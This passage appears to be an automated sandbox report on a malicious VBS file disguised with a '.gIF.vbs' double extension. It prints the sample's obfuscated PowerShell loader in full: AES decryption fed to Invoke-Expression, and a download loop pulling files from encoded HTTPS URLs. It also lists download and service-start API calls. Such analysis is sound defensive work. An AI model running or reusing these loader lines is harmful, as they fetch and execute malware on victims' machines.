'+'CnI/cGJmqVj5jCchNUuqniccRhpmR5qMkJqyaxLjAOoZS+I6UjjzBuHKkMUIawH3bTvDj7nWJq1X++W/D0YbGXb8mznv8QaOqQP1S2jB+yDre2mYNc51z88VDp5yhLxv2jub4BAD5MQkn09gj7sFrzKiS0Lv4bbd7SWdBlNNY01HOPdZZi88uLKrHF094fRfKbDTWl6drqxh86PYBPPz5p2Ly9NFsVGPk0kub6u6Kg9MbD3UxusVGZCdUc0aq5EXDqvPaek1WSrhMDfsWP03fZTtbxI2uIb73uc20hNa8tKlWpVgQcg5yXgT1Syt4JsFjugZ9Qtq1uX/OG7aRAuR2SPi44P27EfktJtInMKpDXYHkjZS52YqNTFAu7vkn80WLfrjaKO1puSNI83KG4Gb5VMO0L0qfDKNvusZUr6nwSAndn5NEdU4kRRcVNX137D+ZBob0WbqlGLDBY6a+EMGzYtzcJ9yDU9sRHuvpnJ5c0hkwPy4DW2nC9xKyXClHpMrOAGz59KK909AdcVa3cZMI4okN0iylLC6wphikPk+n/lH8dSrmPfxXmnyxHQ6FPMQ3t7W6XvHMIHBTNK1roZfwexEEon7dKRDC0d2IrLWlyM+aSkJSwieqOUXpMZyJUm2hcsj8O2qQ6SJSSECSO9pH7mC3RTLzx/Yu4I0g+aMXaEbo7jnGZCzrsoXBRasrE5huijlM3SPVHWt7BmPHFNB5UAtl1Poeor3payTIoDvmHLQ5udJKwLQ55FOeaNJf+pmojioT+Punj9PkhiGcH6xTdE+2IrxNPE7ay7Vlrz0F+zzhORfur8P5pHWq383QgBA8DubDwQoW+2/zvvGy0+vtBVpAZBtMhKqsSHtY4fy3hgqLxKhWAneQJQ8WqLkzqUVDY9EPZtjGeMds6via1iXp+weIOrC5nUhoaj4yGoY2MoXMyeOduTv3614RUxvqvvcerqLinXXajm5YyY2gVFXVy7lQs/l3ppDJ/Er9yz3s9rYpNCLl0sEExFChP/0AEE9hA3qtQqm07KfQM7Fm/TxVhAZZQIl8WYJ4sl9VdVuOvk82qKlTC24fpX5MYkZQF4iy2oZu7+PswZNBWNr+R8IbeXGpk6YULjJIQEn49p7IIebLL4A+J83MoPUBcLr/3wfiOdRztCS5fsI1/7gWW61aBZmh9WQ5Y/PN8qrPMJKYzSp84UIHHxGLfpUuclLTYd6067KhaUF+isNYUo0YQamdLvdcnsAnB1fFVG2Z6opzbG7sqFu6AQguz584NTtWuBMlcl43XDc/g09jFmr9jk22MvT+6/1kqeSuax5g4j6g6n3MjeEp9CvY3LOjh+/KWuQr/Kbqc4JIBZhwkTcrNn4Yi2/MmJ/0v3oIfVqNNecpNoQxXyyJjgkG+362VFqQj/+ROnzXepvq3WcWkQ/CheHAW5Iw==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0 Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0';If (${host}.CurrentCulture) {$Digers++;}Function Svndyssendes94($Dukketeatrenes){$Uadskilleligt=$Dukketeatrenes.Length-$Digers;$Mainlining='SUBsTR';$Mainlining+='ing';For( $truthsman=1;$truthsman -lt $Uadskilleligt;$truthsman+=2){$Revisoratets207+=$Dukketeatrenes.$Mainlining.Invoke( $truthsman, $Digers);}$Revisoratets207;}function Scance($Strukturndringernes){ . ($Gederamsen) ($Strukturndringernes);}$Ambages77=Svndyssendes94 ' MIo zGi lKl,aL/C5F. 0R (.W iSn d o,wOs BNQT. R1 0,.v0P; ,W iBnO6 4D;S Uxy6 4M;, ,rSvM:T1 2.1..P0C) SGBeHc k o,/B2 0O1 0 0 1,0B1F IF i.rBeNf,oHxC/E1 2A1 .U0B ';$slotting=Svndyssendes94 '.UTsUe r.-FA g ern,ti ';$Udvandringerne=Svndyssendes94 ' h tTtjpAsA: /E/KaPs,oDc.i aRt i.a t r.aLd,i tGi.i m aArSi a...r o,/GoLs /,t r aDn.s.p o.rbtEm e,nNt...pAfPmM> hSt t pHs,:P/ /,n.e.w ..qCuPr aLnGu s hbaEi qGe r . oerFg..,s a./ wMpc- a.d m.iKnD/ToNs,e rCvDe /Rtdr,a nps.pro.r.tSm.e n tG. pHfTmI ';$Fluffs=Svndyssendes94 'S> ';$Gederamsen=Svndyssendes94 'Pi,e x ';$Lgnere='Unparalysed';$decos = Svndyssendes94 'Ee cMh,oS % a p pTdaaStSa % \FS n i g m yMr,dJe dPeA. SFkSo. ,& &H FeDc h.oU t ';Scance (Svndyssendes94 ',$ g lHo bOaAlC:PRge.gFr =h( c m,d, /Vc, .$ d.e.cBoBs,). ');Scance (Svndyssendes94 'E$SgElFo b.a lR:CS uLj.eFt,=S$SUTdKvFa,n,dIrDiOn.gSeLr,nSe .HsApGlAi tB( $ FJl.uOfNf.sD)p ');Scance (Svndyssendes94 ',[BN e,t .cS eorHvLi.cVe PSo iNn.tSMcaCn,aogAeKr,]S:D:OSPePc uPr.iKt y PDrCoBt o,cFool I=. C[SNNeLt ..S eBcHu rUi.t yMPMrMo.tKo,c o l.TVyGp e ]N:F:VTRl sR1F2E ');$Udvandringerne=$Sujet[0];$Respriser= (Svndyssendes94 ',$.gIl.o bRaBlP: Y m c a = N eIw -.OLb jbeMc t, S.yEsCt,e mH.RNUeStH.mW e.bRCKl i,e.nMt');$Respriser+=$Regr[1];Scance ($Respriser);Scance (Svndyssendes94 'A$ YDm.c,a .UHUeMaPd.e rSsA[ $FsJlIo tRt,i nKgP]d=,$OA,mTbFaSg e,sK7 7 ');$Genlydens=Svndyssendes94 'S$,Y,mTc,a..SD o,w nSl oFa d FSiBl e.(.$FU,d v aSnTd r i nOg.e rSnAeB,f$ PIruoHgAr a m r.eUdHaUk.t r,s )b ';$Programredaktrs=$Regr[0];Scance (Svndyssendes94 ' $ g lTo b a l,: SMaStWeBlSl i tP=,( Tse sAtT-ZPGaDtAh F$DPSr o g rAa mLrAe d,aAk tCrMs ) ');while (!$Satellit) {Scance (Svndyssendes94 'H$Bg lTo,b.a lH: Rie gOi oCn s.p lpaRnvrae t n iBn gBscl i.n.j.e =,$MtCrMuaeu ') ;Scance $Genlydens;Scance (Svndyssendes94 ',S tCa r,t -.Ssl,eOeSp .4N ');Scance (Svndyssendes9Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0 Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0';If (${host}.CurrentCulture) {$Digers++;}Function Svndyssendes94($Dukketeatrenes){$Uadskilleligt=$Dukketeatrenes.Length-$Digers;$Mainlining='SUBsTR';$Mainlining+='ing';For( $truthsman=1;$truthsman -lt $Uadskilleligt;$truthsman+=2){$Revisoratets207+=$Dukketeatrenes.$Mainlining.Invoke( $truthsman, $Digers);}$Revisoratets207;}function Scance($Strukturndringernes){ . ($Gederamsen) ($Strukturndringernes);}$Ambages77=Svndyssendes94 ' MIo zGi lKl,aL/C5F. 0R (.W iSn d o,wOs BNQT. R1 0,.v0P; ,W iBnO6 4D;S Uxy6 4M;, ,rSvM:T1 2.1..P0C) SGBeHc k o,/B2 0O1 0 0 1,0B1F IF i.rBeNf,oHxC/E1 2A1 .U0B ';$slotting=Svndyssendes94 '.UTsUe r.-FA g ern,ti ';$Udvandringerne=Svndyssendes94 ' h tTtjpAsA: /E/KaPs,oDc.i aRt i.a t r.aLd,i tGi.i m aArSi a...r o,/GoLs /,t r aDn.s.p o.rbtEm e,nNt...pAfPmM> hSt t pHs,:P/ /,n.e.w ..qCuPr aLnGu s hbaEi qGe r . oerFg..,s a./ wMpc- a.d m.iKnD/ToNs,e rCvDe /Rtdr,a nps.pro.r.tSm.e n tG. pHfTmI ';$Fluffs=Svndyssendes94 'S> ';$Gederamsen=Svndyssendes94 'Pi,e x ';$Lgnere='Unparalysed';$decos = Svndyssendes94 'Ee cMh,oS % a p pTdaaStSa % \FS n i g m yMr,dJe dPeA. SFkSo. ,& &H FeDc h.oU t ';Scance (Svndyssendes94 ',$ g lHo bOaAlC:PRge.gFr =h( c m,d, /Vc, .$ d.e.cBoBs,). ');Scance (Svndyssendes94 'E$SgElFo b.a lR:CS uLj.eFt,=S$SUTdKvFa,n,dIrDiOn.gSeLr,nSe .HsApGlAi tB( $ FJl.uOfNf.sD)p ');Scance (Svndyssendes94 ',[BN e,t .cS eorHvLi.cVe PSo iNn.tSMcaCn,aogAeKr,]S:D:OSPePc uPr.iKt y PDrCoBt o,cFool I=. C[SNNeLt ..S eBcHu rUi.t yMPMrMo.tKo,c o l.TVyGp e ]N:F:VTRl sR1F2E ');$Udvandringerne=$Sujet[0];$Respriser= (Svndyssendes94 ',$.gIl.o bRaBlP: Y m c a = N eIw -.OLb jbeMc t, S.yEsCt,e mH.RNUeStH.mW e.bRCKl i,e.nMt');$Respriser+=$Regr[1];Scance ($Respriser);Scance (Svndyssendes94 'A$ YDm.c,a .UHUeMaPd.e rSsA[ $FsJlIo tRt,i nKgP]d=,$OA,mTbFaSg e,sK7 7 ');$Genlydens=Svndyssendes94 'S$,Y,mTc,a..SD o,w nSl oFa d FSiBl e.(.$FU,d v aSnTd r i nOg.e rSnAeB,f$ PIruoHgAr a m r.eUdHaUk.t r,s )b ';$Programredaktrs=$Regr[0];Scance (Svndyssendes94 ' $ g lTo b a l,: SMaStWeBlSl i tP=,( Tse sAtT-ZPGaDtAh F$DPSr o g rAa mLrAe d,aAk tCrMs ) ');while (!$Satellit) {Scance (Svndyssendes94 'H$Bg lTo,b.a lH: Rie gOi oCn s.p lpaRnvrae t n iBn gBscl i.n.j.e =,$MtCrMuaeu ') ;Scance $Genlydens;Scance (Svndyssendes94 ',S tCa r,t -.Ssl,eOeSp .4N ');Scance (Svndyssendes9Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0041CB50 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,4_2_0041CB50
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF848F0816B push ebx; ret 2_2_00007FF848F0816A
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF848F080D3 push ebx; ret 2_2_00007FF848F0816A
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF848F000BD pushad ; iretd 2_2_00007FF848F000C1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_00457106 push ecx; ret 4_2_00457119
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0045B11A push esp; ret 4_2_0045B141
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0045E54D push esi; ret 4_2_0045E556
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_00457A28 push eax; ret 4_2_00457A46
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_00434E56 push ecx; ret 4_2_00434E69
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_10002806 push ecx; ret 4_2_10002819
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0044693D push ecx; ret 7_2_0044694D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0044DB70 push eax; ret 7_2_0044DB84
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0044DB70 push eax; ret 7_2_0044DBAC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_00451D54 push eax; ret 7_2_00451D61
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0044B090 push eax; ret 8_2_0044B0A4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0044B090 push eax; ret 8_2_0044B0CC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00451D34 push eax; ret 8_2_00451D41
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00444E71 push ecx; ret 8_2_00444E81
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00414060 push eax; ret 9_2_00414074
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00414060 push eax; ret 9_2_0041409C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00414039 push ecx; ret 9_2_00414049
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_004164EB push 0000006Ah; retf 9_2_004165C4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00416553 push 0000006Ah; retf 9_2_004165C4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00416555 push 0000006Ah; retf 9_2_004165C4
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_040D0F28 push eax; ret 10_2_040D0F62
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_040D0F68 push eax; ret 10_2_040D0F72
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_040D0F78 push eax; ret 10_2_040D0F82
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_040D0F88 push eax; ret 10_2_040D0F92
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_06EC33D8 push FFFFFFE8h; retf 10_2_06EC33E1
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_06EC1FC8 push eax; mov dword ptr [esp], ecx10_2_06EC21B4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_00406EB0 ShellExecuteW,URLDownloadToFileW,4_2_00406EB0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0041AA4A OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,4_2_0041AA4A

                  Hooking and other Techniques for Hiding and Protection

                  barindex
                  Uses an obfuscated file name to hide its real file extension (double extension)
                  Source: Possible double extension: gif.vbsStatic PE information: createdthingstobefrankwithmeeverywhere.gIF.vbs
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0041CB50 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,4_2_0041CB50
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
